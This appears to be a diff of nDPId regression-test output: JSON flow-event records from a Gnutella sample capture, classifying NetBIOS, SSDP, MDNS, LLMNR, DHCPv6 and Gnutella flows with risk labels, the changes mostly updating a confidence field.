-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00783{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00672{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":12461,"flow_last_seen":75501,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":637,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90746,"flow_last_seen":90799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":90746,"flow_last_seen":91392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3761,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":1717,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1138,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74328,"flow_last_seen":88171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":91380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":90863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1090,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90747,"flow_last_seen":91396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3774,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90747,"flow_last_seen":90902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":670,"flow_tot_l4_payload_len":1773,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":63001,"flow_last_seen":78562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74327,"flow_last_seen":74692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1108,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72907,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1105,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00783{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00672{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":12461,"flow_last_seen":75501,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":637,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90746,"flow_last_seen":90799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":90746,"flow_last_seen":91392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3761,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":1717,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1138,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74328,"flow_last_seen":88171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
